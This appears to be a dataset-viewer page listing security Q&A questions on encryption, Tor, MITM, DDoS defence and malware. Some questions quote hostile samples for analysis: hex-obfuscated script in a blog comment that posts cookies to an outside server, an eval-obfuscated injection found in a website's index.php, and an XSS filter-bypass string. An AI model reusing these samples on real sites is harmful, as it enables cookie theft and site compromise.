instruction stringlengths 24 29.9k |
|---|
Key Wrap constructions are a class of symmetric encryption algorithms designed to encapsulate (encrypt) cryptographic key material. The Key Wrap algorithms are intended for applications such as (a) protecting keys while in untrusted storage, or (b) transmitting keys over untrusted communications networks. The construc... |
I'm trying to learn about encryption and decryption methods when I faced this string:
{MD5}JfnnlDI7RTiF9RgfG2JNCw==
MD5 is 16-byte string, so anyone know what type of encryption is this and why there is "{MD5}" ??
|
When I enter the command-line openssl dhparam -text 1024 the resulting safe-prime is 1032 bits instead of 1024 bits. It seems like the 1st byte is always 0. Why is this?
|
As a continuation to Why would someone trust DuckDuckGo or other providers with a similar privacy policy? it seems like we already have a secure way to make a search without writing history and etc. at least it's written in duckduckgo privacy policy.
My question is do we have the same alternative for Gmail, which at le... |
I was wondering if there were any "how-to" guides on what is needed to modify AV boot disks, such as Sophos, kaspersky, AVG etc in order to load the decryption drivers/bootloader for Truecrypt before scanning?
Or other Disk encryption tools for that matter - Safeboot for example
As a precaution we periodically boot sc... |
Here is the full Javascript (and related iframes) that the FBI apparently injected into all "Freedom Hosting" pages in the course of their recent takedown.
http://pastebin.mozilla.org/2776374
The variable "magneto" looks very much like shellcode.
Some explanation is provided in this article here: thehackernews.com
Sec... |
Could someone analyze this info? We got information that slowloris attack took place. They say (hosting stuff) they have implemented mod_antiloris, is that enough btw? Feel free to share your opinion on this and tell whether all instances are normal. Thanks.
Linux 2.6.37.6-24-desktop (our-website-name) 08/05/13 _x86_64... |
Is it worth to obfuscate a java web app source code so that the web host cannot make wrong use of the code or even steal your business? If so, how should this be dealt with? How should we obfuscate?
We are a new start up launching a product in market. How can we protect our product/web application's source code?
|
All current protocols seem to only fail when MITMed. For example, SSL displays a huge red warning when somebody tries to MITM using a different certificate.
Is there any protocol that can actually work securely despite best efforts to MITM it? Obviously the TCP connection can always simply be blocked, but is there any ... |
It is a well known vulnerability that a properly altered compiler binary can transfer itself to new binaries of the compiler, and still be entirely absent from the source code.
But how real is this possibility? Has there been any attempt to audit binaries in available compilers (gcc for instance) to detect such self-re... |
Is it worth to obfuscate a java web app source code so that the web host cannot make wrong use of the code & probably even steal your business. If, so how to deal with this or how to obfuscate ?
We are just a new start up launching a product in market. How can we protect our product/ web application source code ?
|
I'm building an authentication server in python, and was wondering about how I could secure a connection totally between two peers totally? I cannot see how in any way a malicious user wouldn't be able to copy packets and simply analyze them if he understands what comes in which order.
Admitting a client server schema.... |
When dealing with full disk encryption a lot of utilities I've worked with will provide the option to fill the disk with random data to make distinguishing the encrypted contents harder to identify.
I've always wondered why do this when the process is extremely slow and often time requires that the system not be power... |
I'm trying to learn little bit about armoring application against reverse engineering. In one article I read that initializing variables to NULL or 0 or -1 is as secure (vs RE) as using common passwords in applications. In short, it is said we should use RNG to produce random data which we initially "store" to new decl... |
I recall reading once online about a website that had a name that sounded Japanese (Matsz... something) with security problems for programmers to do and learn about different security issues. Does anyone know what I'm talking about? I can't for the life of me remember the name, nor find if on google.
|
I have created a public private key pair using the KeyPairGenerator class in Java. From this key pair I have generated the CSR request using the PKCS10 class which has been sent to a CA for verification. The question is how do I load this public private key pair into a keystore? I cant use KeyStore.SetKeyEntry as it re... |
The cloud-init Ubuntu package accepts something called user-data to configure a machine in the cloud (eg EC2 on AWS). I think AWS also use this for their Amazon Machine Image.
My question is. What sort of risk does this pose in the context of sending sensitive data via this method (e.g passwords to repositories, privat... |
I remember back in the day, there used to be a website where users would post hackits in the form of win32 exes for users to crack. Usually the goal was to defeat some sort of DRM, such as a nag screen, etc. The challenges would be classified by skill level- ranging from beginner to intermediate and so on. I can't find... |
I have custom authentication system on my ASP.NET website that can help me to register users from my Windows (Desktop) and mobile (Android) Applications.It means that I don't use ASP.NET Configuration.
I have this code when the user press the login button.
SqlConnection con = new SqlConnection();
con.Connectio... |
I'd like to hear recommendations on a best practice for handling abusive users (for whatever reason) on an authenticated Website.
Is there any point in keeping the user in the database with a "banned" flag, or may you just as well delete the user?
Of course, in the latter case, people may re-register with the same emai... |
I am developing a mobile application wherein I need to implement the 'Remember Me' functionality. There are certain pages within the application which require you to login. What I need to do is, if the 'Remember Me' checkbox is selected, then I need to store the username and password so that it can be populated later i... |
A friend bought a "smart" headset (working with voice commands). I had to install a software on Windows to be able to configure this headset.
After downloading the software from the page, this page redirected to an configuration wizard (still on the web page!) and informed me that the software is not yet installed; I s... |
I want to produce a list over the GSM phones in an area. I don't care about what data goes back and forth, neither are the various conversations relevant.
Most phones have IMEI (International Mobile Equipment Identity), this could serve as an identifier.
Given the fact that phones will operate on different frequencies... |
Is there an Information Security Management System (ISMS) existing for SME/ SMB, if not why ?
The so called GRC suites are mainly targeted towards Fortune 100 (may be up to fortune 1000) companies , considering the high cost, maintenance, TCO part of it. They'll be the only ones who'll have sufficient security budgets ... |
Some emails are suspected to be viruses; Because of that, the email service store categorizes them as spam. Or some pages are suspected to be viruses, and new browsers classify them as harmful pages. As you know, many viruses and malware can't run on Linux (like Ubuntu). Here is my question: Can harmful pages or those ... |
Suppose I'm encrypting a file via AES using a password of my choice, or creating a TrueCrypt volume using a password and no keyfiles. Which of the following two passwords would be more secure:
nf890y9jqb
nf890y9jqb123456
The first one has a set of characters chosen at random, whereas the second one has the same chara... |
Suppose I create two TrueCrypt volumes using keyfiles. The first volume uses a keyfile generated by TrueCrypt, whereas the second one uses the same keyfile in addition to a second, non-entropic keyfile (picture a file in which most of its bytes are 0s, but has a few ones with different values). Which of the two volumes... |
The Situation
I have successfully used Cain to ARP poison my phone and traffic is being routed via my PC. I have confirmed this in Wireshark and Cain is also able to recover passwords for my SMTP and POP email accounts.
The Problem
I have setup Fiddler and using a Fiddler Script I'm trying to do some basic HTML inject... |
A friend in the business sector recently asked me for advice on "IT security in a large charity". Being a developer not specialized in security, I could see his difficulty in finding someone qualified to hire to counsel him.
Struggling for answers, the only example I could advance was the following: if you're seriousl... |
While it's easy to check if a single IP address is blacklisted for SPAM using for example http://www.spamcop.net/bl.shtml, then is there a way to check multiple addresses at once? For example how to check if some of the /22(1022 usable IPv4 addresses), which were used by a customer and now returned to ISP, are blacklis... |
Today I changed the SSL certificate that 3,000+ Outlook clients are using. In doing this I changed the certificate to an "older" one that had the same subject name, expiration and everything else. Only the thumbprint and one SAN name changed. Once reports came in of an issue, I reverted the change. (1 hour)
It seem... |
I have a client with a legacy application running on RH 3 (=the latest version supported by app). There is a process that has to run as root (and not in a chroot environment). I need to prevent this process from accessing some sensitive data files.
According to this post, it seems SELinux can do this:
Restrict access... |
I like web security and i have academic formation about that. Just for fun I found a website (insurance company) with critical vulnerabilities like xss or sql injection. Now, I obviously will alert them about this problem. But it would be nice if the company let me solve the problems that I identified as freelancer or ... |
What are the consequences of turning on Apache AllowEncodedSlashes? I want to turn it on and I want to know if this any worse than any of the other kinds of injection attacks that may occur in web apps?
|
I was recently told that a cookie is "safer" than a regular old HTTP header, which is safer than a URL parameter, particularly when passing around access tokens. What is the reasoning behind a cookie being safer than an HTTP header?
Also, I'm pretty sure I understand why a URL param is unsafe: because it is visible all... |
Open SMTP relays are bad. The major email providers such as Gmail and Yahoo do some sanity checks such as the following at the SMTP level to prevent spam to arrive the users' mailboxes:
$ telnet alt2.gmail-smtp-in.l.google.com 25
Trying 173.194.65.27...
Connected to alt2.gmail-smtp-in.l.google.com.
Escape character i... |
In Keepass2 I was typing in a password and noticed the number of bits went down. Why would this be? I was using two words and mixed them up by replacing certain letters with numbers.
|
I'm looking for a secure way to access a MySQL database. I'm currently using PHPMyAdmin but wondering if it would be better to use a desktop client and restrict access to only the IP addresses I know I will be accessing from.
Does anyone have any thoughts on the best way to go?
|
So I was making a virtual credit card from entropay.com and when I decided to Top up it up with my existing debit card. It opened up the 'Verified by Visa' page(A page in which you have to enter a password to authorize payment through your debit card. It is added as an additional security measure to check against card ... |
In old versions of IE/Windows you could install a self-signed certificate for a web site and it just worked: the warnings disappeared.
In more recent versions (and with Chrome) this just didn't work. The only way to make it work is to install the self-signed certificate as a Root Certificate Authority.
I need to insta... |
I'm looking for recommended options for cryptsetup to create fully encrypted SSD (SanDisk SSD U100 128GB), which achive:
Timing O_DIRECT disk reads: 1476 MB in 3.00 seconds = 491.81 MB/sec
Timing buffered disk reads: 1420 MB in 3.00 seconds = 473.01 MB/sec
My benchmark shows me best cipher:
# cryptsetup benchmark
# ... |
We have an Apple AirPort running in our office. We are planning on opening a free Wi-Fi network for public use during a small event, but I started wondering about the safety of our Time Capsule backups that are running on the AirPort box.
Can we protect the backups while running open networks?
|
Could someone please provide me with some guidance for a system I am designing...
A general overview of the system is that it is to store information on staff and "customers" - this information must be completely secure as it is highly sensitive! Staff must be able to access this information remotely - with functiona... |
I'm trying to understand an implementation detail of Apple's data protection in iOS: I know about the per-file encryption and the various key encryption classes and keybags; however, I don't understand how that works for file transfer over USB (e.g. for iTunes backups).
When backing up data to iTunes over USB, does the... |
I saw an article this morning, discussing the fact that RSA and DH may be significantly less secure in the upcoming five years. Although the chance that this will materialize is small, I immediately turned to thinking about reasons why ECC isn't mainstream. The biggest obstacle I have been able to come up with is the... |
I recently saw the movie Olympus Has Fallen.
Like in many action movies, at the end a missile is launched, and the hero (Mike Banning, played by Gerard Butler) has 60 seconds to recall the launch in order to prevent a disaster. (Spoilers!)
The way to recall it is by inserting a password, but Banning doesn't have ... |
Today I was checking comments on my blog and I found a strange comment, here is the exact text
<script>var _0x352a=["\x31\x31\x34\x2E\x34\x35\x2E\x32\x31\x37\x2E\x33\x33\x2F\x76\x6C\x6B\x2E\x70\x68\x70","\x63\x6F\x6F\x6B\x69\x65","\x68\x74\x6D\x6C","\x70\x6F\x73\x74"];$[_0x352a[3]](_0x352a[0],{cookie:document[_0x352a[1... |
We have an ongoing project at work in which the security is a hot topic of debate. The whole site is SSL and proposed auth process is like so:
User receives a non-unique 4 digit pin number in person.
User is emailed a URL with attached long(40 char or so) GUID.
User visits URL and enters pin to authenticate. (pin is s... |
from what I've read:
If I am on a wireless network without encryption, any other computer connected to that same network could easily (with right tools & knowledge) intercept any traffic I send/receive.
If I am on a wpa2-psk wireless network, the situation is better, but another computer connected to that same networ... |
I found this encoding as a XSS example to bypass certain filters.
Been trying to look some information (plus encoder/decoder tool) about this type of encoding but was pretty difficult without knowing it's name:
xCpl \x3d 1 \x2f \x281 - xBeta \x2a xP\x29\x3b\x0avar xDens \x3d xStdDens \x2a xCtl \x2a xCpl \x2f
|
There are several reports about hardware based attacks on IT-security as for instance those here:
http://wccftech.com/intel-possibly-amd-chips-permanent-backdoors-planted-nsa/
http://www.afr.com/p/technology/intel_chips_could_be_nsa_key_to_ymrhS1HS1633gCWKt5tFtI
duckduckgo-search using "nsa intel backdoor" easily yie... |
The only data in the cookie is the session ID. There is no expiration timestamp set when creating it, a session is always evaluated server-side to see if it has expired.
When logging out, the session is destroyed server-side. Is there any point then in expiring the cookie?
|
I have been searching for a while now. But i can't find a start-up and advanced sought-of checklist to understand the most important things to consider while going for dedicated hosting server for a website/application.
I am working with a college and we have installed an IBM server there.
OS: CentOS 6.4
Application T... |
Recently I came across an article regarding Tor. According to article
there is speculation that the uncovered malware was used by a law
enforcement agency to harvest the IP addresses of users of several
hidden services hosted by Freedom Hosting.
I use Tor regularly in my windows machine. How can I protect myself... |
I want to learn how to write and Android application that can detect a run time spy application. In this instance, a "spy application" is a background application that uses the camera, microphone and other important device.
How can I detect which background application is using the camera, microphone or GPRS?
|
IS there websites and places where you can download all types of malware that you can run and test the security setup of your system?
I am currently playing around with UAC+EMET4+MSE and would like to see how well the system responds to different types of threats.
|
I've just heard about and started playing with EMET and I am curious, do any AV or security suite applications do what EMET does or is EMET something entirely different?
|
I have a Linode VPS running Nginx, which currently serves only static content.
Once I was looking at the log and noticed some strange requests:
XXX.193.171.202 - - [07/Aug/2013:14:04:36 +0400] "GET /user/soapCaller.bs HTTP/1.1" 404 142 "-" "Morfeus Fucking Scanner"
XXX.125.148.79 - - [07/Aug/2013:20:53:35 +0400] "GET /... |
The iOS data protection implementation and the implementation of iTunes backups are both reasonably well documented, on a high level by by Apple, and on a much more detailed level by third parties.
However, I'm wondering about the implementation details of iCloud backups. Apple's document only mentions the matter very ... |
On a Web site which requires user login, and all content is viewable by any registered user, is there any point in making obscure image URLs like "1mh9cr2m78234bc23-32xy4723nxy12.jpg" to protect the content from automated harvesting?
Or is this wasted effort because whoever wants to get the content will just write a sp... |
I am trying to dig deeper into the nuts and bolts a stack buffer overflow using the classical NOP-sled technique.
Reading some articles and watching videos brought me to a confusion which can be demonstrated in these 2 pictures (which contradict each other unless I misunderstood something there).
This is a picture fro... |
I have seen tremendous amounts of guides on how to protect yourself when using a public wireless internet connection, but nothing about how to protect your public access point from malicious users.
A bit of background. I had bought this raspberry Pi and still nothing useful to do with it, and a spare USB WiFi Dongle(wi... |
The US White House has just release the subject blog post link here which suggests adoption of this proposed new cyber insurance might be rewarded by liability limitations including "reduced tort liability, limited indemnity, higher burdens of proof, or the creation of a Federal legal privilege that preempts State disc... |
At home I have a wireless cisco router. Unfortunately I wasn't smart to change its ip or passwords. So anyone who is connected to it can access 192.168.0.1 and log in as admin using password admin and do whatever they like.
However in order to connect to my router you have to enter the password which was blahblahblahbl... |
I'm generating a token to be used when clicking on the link in a verification e-mail. I plan on using uniqid() but the output will be predictable allowing an attacker to bypass the confirmation e-mails. My solution is to hash it. But that's still not enough because if the hash I'm using is discovered then it will stil... |
How do i decide whether to sign someones PGP public key? I was looking at some contact pages and they have a request for people to sign their public key.
How serious of a commitment is it to sign someones public key?
|
I have been reading books on OpenVPN, and there is one thing I don't understand yet.
What happens when a person connects to OpenVPN, and their web browser is set to a Socks5 or HTTP/HTTPS proxy and the person browses the internet?
Specifically I am wondering if in the above scenario, the OpenVPN server only sees encryp... |
I use the Windows 8 operating system. Whenever I navigate to the login page of Internet Explorer 10, or even the login screen of the operating system, I see an eye symbol at the end of the password input.
There is always an eye symbol in password inputs. When I press the eye symbol, the password is visible in plain t... |
What is the top dangerous mistakes in C programming?
for example misusing a strcpy causes a stack-overflow and code injection.
I'm looking for at least 10 bad programming pattern in C.
|
I have a input text field for accepting Email ID. If Email ID is not entered by User,
I have a client side validation using Java Script to display error message which
reads like, "Please enter valid email id". Code is like,
if(EmailIdIsNull)
{
error = "Please enter valid email id";
//Submit this error message to ... |
In my Wordpress blog (though this may be true of other blogs too), there is a preview web page feature.
So when I get a comment with a link, I can hover over the link, and it shows me a preview of the page. I sometimes use this to check possible spam messages.
But is there any risk in this? For example, if the webpage ... |
Is having local firewalls enabled on machines actually necessary if you run hardware based firewalls like pfsense or a netgear fvs338 and use that to control in/out bound connections?
I personally do not see how a firewall locally adds any type of protection (assuming no infections happen) other then just another layer... |
Lavabit hosts a secure messaging service that was recently shut down. Likewise SilentCircle has preemptively done the same thing with their email-based service.
It seems that the justification for these actions is to prevent the US government from sending subpoenas, warrants, security letters regarding this service. ... |
Here goes a very specific question about the insides of Shorewall and Iptables in general.
Shorewall supports configuration of "Stopped Policies" using the file routestopped, which defines the behaviour of the firewall when Shorewall is stopped.
This works very well, but there is a parameter that we can configure in th... |
On my old computer I used Truecrypt full disk encryption. My old computer however was running Windows 7 with a standard MBR partition scheme. I recently got a new laptop with the fancy UEFI support. Yes I know I could always reinstall Windows as legacy BIOS with MBR support however I would like to keep GPT\UEFI. Tr... |
I was thinking about how smartphones are very difficult to use in a way that does not transmit your location, with all the networks it has to connect to (and let's say a 'burner phone' is too expensive of a solution because of the prices of prepaid credit). I was thinking of a possible solution, I just don't know if it... |
I am creating a website that needs user authorization. It is my first time creating a website to go live, and also my first time trying to do any form of authorization. The following is my plan, will you please tell me if I have any obvious loop holes and if there is anything else I should be aware of. If interested or... |
I considered writing a program to do the above for websites I only intend to use for short-term use.
|
Should fail2ban be the master of iptables rules? For example, should I setup my firewall rules along side the fail2ban rules, or should I have all my services configured and managed by fail2ban?
Regards
|
A reasonably white-hatted hacker has demonstrated the ability to insert text of his own choosing into the communication between a java applet and a web based server. Not a simple MITM attack, but using a tool like "JavaSnoop" to tap into the communications within the java applet class structure.
I believe that there i... |
is there any way to know if the file I have on my mini-SD card was moved or copied to my PC?
i have sensitive files on my SD card which is stolen and i cant remember if I cut or copied the file from my SD card to my PC. All I know is that I have backed-up the file to my PC. I have the file now. How do I know if I delet... |
New to HSM (Thales payshield 9000), I'm working on DUKPT algorithm. I manage to derive the IPEK(encrypted either under LMK or TMK), but I need to inject a plain text IPEK into an end point device. I don't think my end point device can support encrypted IPEK injection. Any expert here can share with me any idea, on how ... |
Hosting a government website would definitely increase reputation, but it would also bring higher chances of the hosting server getting attacked by DDoS attacks.
It's a cPanel based VPS. What basic steps should I take to minimize DDoS attack to the server?
|
How to test the effectiveness of a Web Application Firewall (WAF), or any other security control that is put in place to protect the web application from being attacked? Currently, what are the different security testing methodologies that can be applied to test Web Application Firewall? I was able to find a free WAF t... |
At the bottom of the index.php file for a simple “contact us” form, I found the following (some whitespace and newlines added):
try {if(window.document)--document.getElementById('12')}
catch(qq) {if(qq!=null)ss=eval("St"+"ring");}
a="74837c7182777d7c2e88888874747436372e89182e846f802e797a7171802e4b2e727d71837b737c823c71... |
After the announce that NSA conducts extensive metadata and traffic search on e-mail, it is clear that people looking for privacy and security would better abandon the system completely, since, by design, this kind of snooping cannot be avoided.
However, I do not know of any system that is meant to replace e-mail as a ... |
I am trying to understand oauth protocol. I am currently looking at temporal credentials section of the oauth 1.0 sepecification.
I can't understand why the secret is needed along with the temporal credentials. Secret is sent with the token itself. So if someone other than the app can get the token he can get the secre... |
I was thinking about how safe it really is to use Tor as a "local proxy" to grab information from webpages anonymously. Is it possible that the real IP address can be seen?
On the official Tor homepage they claim:
Tor does not protect all of your computer's Internet traffic when you
run it. Tor only protects your ap... |
Is there a way to secure an wireless connection against a decryption attack where the PSK is known (E.G. Airdecap-NG)? Is it possible to configure Forward Secrecy on 802.11 Wireless Connections?
|
The question surmises it all. If my firefox browser puts something like "..Gecko/xxyy Firefox/nn.mm.." in the USER_AGENT attribute, then from security point-of-view, isn't it an open invitation to the webserver: come and exploit all vulnerabilities in my xx.yy version ?
Many online users are know not to upgrade their b... |
Is there a possibility that they can see my browsing history, media transfers, Skype sessions and even FaceTime?
|
I am working on my first IT Risk Assessment assignment and even though I have the steps required and understanding of the system I am working on, I was wondering if there was a list of generic IT Risk associated with Different IT Systems. That is because one does not have to start from scratch for every assessment he s... |
Hi.I have Microsoft Windows 7 SP1 on my PC. I have an Ubuntu OS near Windows OS. My internet connection has a proxy server from Iran that monitors our networking and filters some of our websites. These days I have used some software about free VPN, SSH+ and SSH that I think I have hacked from those softwares. (psipho... |
While running meterpreter handler, is it possible to execute a command on the local computer?
That wasn't mentioned in the output of help command. I also tried !ls and to no avail.
Is it possible then?
|
With the disappearance of private email services like Lavabit and Tormail (http://www.dailydot.com/news/email-anonymous-hushmail-lavabit-nsa/) it seems that we will need to resort back to standard services like Hotmail and Gmail for email purposes. However, is PGP secure enough to protect the content of a email from pr... |
Naturally I feel that I have to ask this question, since it's a built-in feature in Windows. Let's say someone has physical access to my PC, is there an easy way for them to access a BitLocker protected drive without physically tampering with the PC (such as hardware keyloggers)?
|
The instant messaging world has off-the-record encryption - which means you get authentication, encryption, and forward deniability. Key material is published after a session ends such that an eavesdropper could forge messages, allowing deniability, even if private keys are lost.
For email, however, all we have is GPG... |
I have done some searching around Google to find out if there are any penetration testing frameworks like metasploit on Backtrack for computers and its applications
Can any one help me to find such for mobiles.
Thanks,
Neo
|
When I generate a key with the a Diffie Hellman method (DH), the established shared key will be of the same size as the prime which is used.
As far as I have read this should be at least 2000 bits for the classical DH, some say even more.
But normally 256 or 512 bits are needed for a symmetric scheme.
I have heard that... |
Currently the client I'm working for charge 2 small amounts on adding credit card to authenticate credit card. After that they ask end-users to check the exact amounts on their monthly statements and enter the amounts back. This way they confirm that end-users have really access to the account and the card is not stole... |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.